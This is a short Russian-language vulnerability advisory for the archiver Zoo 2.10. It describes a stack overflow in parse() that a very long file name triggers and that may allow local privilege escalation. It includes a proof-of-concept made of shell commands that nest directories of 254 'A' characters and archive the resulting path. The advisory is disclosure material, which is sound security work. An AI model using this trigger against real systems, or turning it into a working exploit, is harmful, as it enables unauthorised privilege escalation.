Программа: Zoo 2.10

Уязвимость позволяет локальному
пользователю повысить свои привилегии на
системе. Уязвимость существует из-за ошибки
проверки границ данных в функции "parse()"
в файле parse.c во добавления в архив файла с
очень длинным именем. Локальный
пользователь может с помощью специально
сформированного имени файла вызвать
переполнение стека и выполнить
произвольный код на системе.

Пример:

mkdir `perl -e ‘print "A"x254’`
cd `perl -e ‘print "A"x254’`
mkdir `perl -e ‘print "A"x254’`
cd `perl -e ‘print "A"x254’`
touch feh
cd ../..
zoo a arch.zoo `perl -e ‘print "A"x254 . "/" .
"A"x254 . "/feh"’`

 



Оставить мнение